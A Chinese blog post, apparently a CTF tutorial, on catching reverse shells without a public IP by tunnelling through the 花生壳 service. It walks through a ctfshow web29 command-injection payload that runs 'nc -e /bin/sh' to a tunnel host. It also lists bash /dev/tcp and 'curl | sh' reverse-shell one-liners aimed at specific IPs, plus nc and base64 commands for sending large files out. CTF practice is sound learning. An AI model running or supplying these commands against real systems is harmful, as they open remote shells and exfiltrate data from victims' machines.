目录

  1. 1. 前言
  2. 2. 下载花生壳
  3. 3. 配置
  4. 4. nc
  5. 5. 起http服务
  6. 6. 实战
  7. 7. 多种反弹shell的方式
    1. 7.1. bash弹shell
    2. 7.2. curl弹shell
    3. 7.3. 反弹 shell 传大文件

LOADING

第一次加载文章图片可能会花费较长时间

要不挂个梯子试试?(x

加载过慢请开启缓存 浏览器默认开启

无公网ip反弹shell

2023/6/30 Web
  |     |   总文章阅读量:

前言

因为最近遇到的不少题目都需要我们反弹shell到自己的vps上,但是vps它到后面要花不少钱啊(

于是找了找有没有什么白嫖的方法(x

参考ctfshow的这个视频无公网ip反弹shell

2024.4.7:公网弹shell的极省钱方案(赞美探姬)https://github.com/ProbiusOfficial/Hello_CTF-Shell

下载花生壳

官网

下载安装

注册账号登录即可

然后激活内网穿透的功能

image-20230630161615638


配置

点击映射数进入浏览器

image-20230630161836198

选择添加映射

image-20230630162129982

映射类型选择TCP

模板选择SSH

外网域名会给我们自动生成

内网主机如果是本机的话就是127.0.0.1,端口为你要开启监听的端口,虚拟机的话输入ifconfig查看自己的ip地址

这样就可以了

image-20230630162932880


nc

nc开启监听

image-20230630164039261


起http服务

python3 -m http.server 80
php -S 0.0.0.0:8080
ruby -run -e httpd . -p 9000
busybox httpd -f -p 3333

运行在哪个目录,网站的根目录就在哪

然后花生壳那边配置的内网端口要设置为这里对应的端口号

映射类型要花6块钱买个HTCP(悲报:此方法因为访问会先跳转到欢迎页,已不适用ctf)


实战

以ctfshow web29为例

?c=system("nc 76135132qk.imdo.co 50132 -e /bin/sh");

image-20230630163108532

执行命令,成功连上虚拟机反弹shell

image-20230630164102709

命令执行获取flag

image-20230630164142859


多种反弹shell的方式

更多弹shell参考:

https://www.ddosi.org/shell/

https://www.revshells.com/

bash弹shell

bash -c 'bash -i >& /dev/tcp/115.236.153.172/13314 <&1'

curl弹shell

利用网站:https://reverse-shell.sh/

curl https://reverse-shell.sh/115.236.153.172:13314 | sh

反弹 shell 传大文件

双方均有 nc:

nc -lvp 4444 > out.file

nc <攻击者IP> 4444 < bigfile.iso

优雅地使用 base64:

nc -lvp 4444 > data.b64
base64 bigfile.tar.gz > /dev/tcp/<攻击者IP>/4444